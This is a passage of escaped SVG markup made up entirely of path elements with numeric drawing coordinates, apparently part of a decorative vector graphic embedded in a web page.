d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path 